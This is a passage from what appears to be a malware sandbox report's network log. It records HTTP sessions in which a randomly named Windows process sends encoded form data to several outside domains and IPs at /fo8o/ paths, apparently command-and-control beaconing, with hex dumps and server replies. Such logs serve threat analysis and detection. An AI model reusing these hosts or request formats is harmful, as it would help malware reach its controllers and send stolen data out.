20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49734	46.30.213.191	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:24.612482071 CEST	520	OUT	GET /fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&VVq=lF_H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.antonio-vivaldi.mobi Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:29:24.810463905 CEST	865	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 320 Expires: Fri, 19 Apr 2024 01:39:24 GMT Last-Modified: Fri, 19 Apr 2024 01:29:24 GMT Date: Fri, 19 Apr 2024 01:29:24 GMT Content-Type: text/html; charset=utf-8 location: https://musee.mobi/vivaldi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&VVq=lF_H X-Onecom-Cluster-Name: X-Varnish: 570079379 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 62 44 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 61 30 35 42 30 62 38 6c 62 30 53 4a 79 71 32 43 76 78 4b 53 65 69 74 45 38 41 47 56 6e 6c 54 6c 6c 64 5a 45 38 32 70 67 6f 6c 6b 50 79 54 6e 52 44 4f 38 3d 26 61 6d 70 3b 56 56 71 3d 6c 46 5f 48 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&VVq=lF_H" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49735	85.159.66.93	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:30.804723024 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75 Data Ascii: bD=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu
Apr 19, 2024 03:29:31.094563007 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 19 Apr 2024 01:29:30 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-04-19T01:29:35.9678496Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49736	85.159.66.93	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:33.578766108 CEST	805	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d Data Ascii: bD=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==
Apr 19, 2024 03:29:33.869122982 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 19 Apr 2024 01:29:33 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-04-19T01:29:35.9678496Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49737	85.159.66.93	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:36.348773003 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 6c 49 64 32 32 57 34 59 38 31 6b 35 48 74 4b 79 35 78 32 32 66 72 4d 73 62 4f 6f 74 6b 76 62 68 69 36 34 36 72 72 65 6d 43 53 68 62 72 6f 44 55 6a 55 67 73 75 36 63 37 43 6a 59 4c 6b 4b 74 46 7a 6d 70 58 52 47 6c 33 4c 64 37 43 62 69 42 6d 75 52 69 64 75 79 4e 64 6f 76 31 35 76 4c 44 56 66 44 45 75 69 37 74 75 6d 39 45 37 76 34 65 36 33 56 76 42 64 65 43 36 6a 6f 44 53 36 73 68 75 46 63 62 34 4a 30 6d 75 58 6e 64 47 71 6a 73 5a 7a 79 4a 47 30 6a 2f 53 73 6c 72 71 52 69 68 7a 71 71 43 67 68 6f 30 48 6e 55 6c 63 69 47 46 4c 33 4e 58 57 2b 74 57 55 52 6c 4c 31 63 43 63 34 42 4d 72 65 70 76 55 78 54 44 6a 77 70 42 7a 4e 7a 46 61 6b 73 70 2b 41 35 56 77 63 53 63 34 57 46 49 2b 61 69 68 6d 49 4a 6c 67 37 45 4a 73 31 33 6b 70 4d 57 43 4a 58 2f 2b 57 62 4b 59 48 4b 59 33 2b 54 33 62 66 79 7a 57 43 54 4e 51 36 77 41 70 36 4a 6a 76 61 54 59 61 7a 38 47 59 66 64 48 79 51 4c 59 52 50 74 34 6e 46 59 57 53 30 32 42 39 59 34 2f 55 75 77 50 6a 53 61 32 2b 53 2f 2b 5a 55 4a 44 30 6d 46 77 4f 46 70 64 2f 55 61 56 45 4a 79 32 30 43 57 57 66 67 66 71 44 5a 47 38 52 32 64 4d 76 6e 64 37 50 75 54 55 5a 33 5a 45 41 57 77 6b 63 73 2f 33 63 55 43 38 42 6e 49 4b 32 38 35 76 32 49 75 76 61 69 42 58 73 32 4e 6d 30 42 51 44 4f 7a 6f 46 32 57 72 2b 7a 68 6a 65 38 36 6e 6c 79 6f 71 36 64 6d 78 37 38 32 71 5a 78 6c 78 57 53 36 63 45 50 68 49 6f 66 67 58 2f 55 6d 6f 76 76 66 41 66 47 78 62 73 77 69 42 6c 49 67 6a 62 51 76 34 33 46 50 65 57 55 59 46 71 32 4f 53 63 33 32 6d 30 50 70 64 6b 4b 47 44 63 6b 2b 57 51 65 46 49 62 74 54 70 41 69 72 78 42 38 34 70 61 44 47 58 2b 55 75 42 76 73 39 6f 52 6c 66 4e 39 59 70 57 57 72 6f 62 54 6b 55 4a 56 68 54 4a 4d 61 73 56 37 32 53 48 71 79 32 66 61 4a 50 77 35 31 77 30 35 50 61 62 63 66 75 2b 65 47 44 61 66 6b 75 46 61 6d 59 6c 6c 45 79 38 42 2b 65 4c 54 37 72 44 45 76 53 37 42 74 2b 6c 4b 65 35 6d 79 76 47 7a 76 68 4e 48 61 48 42 6b 67 68 6b 65 65 67 6d 61 64 67 74 63 47 44 2b 67 61 31 5a 4d 6f 64 2b 54 70 53 6d 4e 77 4e 38 75 57 73 70 62 31 76 75 57 4e 4e 6e 61 6c 66 6b 32 52 63 38 45 67 4d 5a 75 33 75 66 4e 50 71 65 66 57 35 43 4d 77 68 34 62 63 53 79 56 36 59 45 64 47 68 69 35 4c 38 39 48 39 57 4c 41 31 6e 61 7a 69 77 64 31 49 67 34 59 58 77 6c 44 46 4c 68 56 64 75 61 6b 57 6a 2f 45 51 4e 68 59 43 56 63 6f 59 6a 66 52 34 4a 39 66 55 68 54 57 6e 72 49 79 44 50 33 54 74 6b 32 4c 37 6d 73 79 66 79 76 45 39 6e 66 2f 69 56 4f 78 34 39 78 62 71 44 61 79 39 49 48 32 63 44 74 62 6b 65 58 4d 59 49 77 4a 61 4d 6f 79 66 74 4a 47 38 39 6b 57 31 4b 4b 36 6b 58 49 54 6a 6b 76 75 67 6a 33 54 59 49 2f 4d 72 67 61 53 33 78 6d 4d 38 39 31 44 46 6d 50 65 49 75 4d 46 52 6b 7a 52 34 4a 55 51 39 42 52 39 50 58 52 57 75 4e 2b 33 44 42 36 47 68 41 43 59 63 43 5a 54 45 2f 5a 35 4d 63 62 53 36 49 3d Data Ascii: bD=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMauEm8bCpZ07xKGKP3Hc2vy4DiE+H6HrFiKhcecr+aUYwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KM0XOCe8XRcDTVghixeA7v8gYFi/8kessKyee1EOvN8QJNfUDGMg+e9y1shQ9usKTssJgv/mdbp/oCt3lId22W4Y81k5HtKy5x22frMsbOotkvbhi646rremCShbroDUjUgsu6c7CjYLkKtFzmpXRGl3Ld7CbiBmuRiduyNdov15vLDVfDEui7tum9E7v4e63VvBdeC6joDS6shuFcb4J0muXndGqjsZzyJG0j/SslrqRihzqqCgho0HnUlciGFL3NXW+tWURlL1cCc4BMrepvUxTDjwpBzNzFaksp+A5VwcSc4WFI+aihmIJlg7EJs13kpMWCJX/+WbKYHKY3+T3bfyzWCTNQ6wAp6JjvaTYaz8GYfdHyQLYRPt4nFYWS02B9Y4/UuwPjSa2+S/+ZUJD0mFwOFpd/UaVEJy20CWWfgfqDZG8R2dMvnd7PuTUZ3ZEAWwkcs/3cUC8BnIK285v2IuvaiBXs2Nm0BQDOzoF2Wr+zhje86nlyoq6dmx782qZxlxWS6cEPhIofgX/UmovvfAfGxbswiBlIgjbQv43FPeWUYFq2OSc32m0PpdkKGDck+WQeFIbtTpAirxB84paDGX+UuBvs9oRlfN9YpWWrobTkUJVhTJMasV72SHqy2faJPw51w05Pabcfu+eGDafkuFamYllEy8B+eLT7rDEvS7Bt+lKe5myvGzvhNHaHBkghkeegmadgtcGD+ga1ZMod+TpSmNwN8uWspb1vuWNNnalfk2Rc8EgMZu3ufNPqefW5CMwh4bcSyV6YEdGhi5L89H9WLA1naziwd1Ig4YXwlDFLhVduakWj/EQNhYCVcoYjfR4J9fUhTWnrIyDP3Ttk2L7msyfyvE9nf/iVOx49xbqDay9IH2cDtbkeXMYIwJaMoyftJG89kW1KK6kXITjkvugj3TYI/MrgaS3xmM891DFmPeIuMFRkzR4JUQ9BR9PXRWuN+3DB6GhACYcCZTE/Z5McbS6I=
Apr 19, 2024 03:29:36.635330915 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 19 Apr 2024 01:29:36 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-04-19T01:29:41.5103163Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49738	85.159.66.93	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:39.132958889 CEST	514	OUT	GET /fo8o/?VVq=lF_H&bD=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:29:39.380234957 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 19 Apr 2024 01:29:39 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-04-19T01:29:44.2531037Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49739	91.195.240.94	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:44.722827911 CEST	784	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 38 39 4a 64 39 49 54 71 44 51 47 32 64 48 32 67 68 72 61 55 52 44 67 6b 56 55 4f 52 48 32 77 49 51 70 6c 30 4f 4b 65 34 35 36 50 Data Ascii: bD=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p89Jd9ITqDQG2dH2ghraURDgkVUORH2wIQpl0OKe456P
Apr 19, 2024 03:29:44.935115099 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Fri, 19 Apr 2024 01:29:44 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49741	91.195.240.94	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:47.469289064 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 69 6b 58 4d 38 52 6e 32 61 4b 51 52 6c 6d 5a 47 35 33 4e 66 73 33 6c 50 63 61 46 6e 63 73 47 78 34 4f 35 64 41 2f 36 77 76 55 67 3d 3d Data Ascii: bD=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjikXM8Rn2aKQRlmZG53Nfs3lPcaFncsGx4O5dA/6wvUg==
Apr 19, 2024 03:29:47.680767059 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Fri, 19 Apr 2024 01:29:47 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 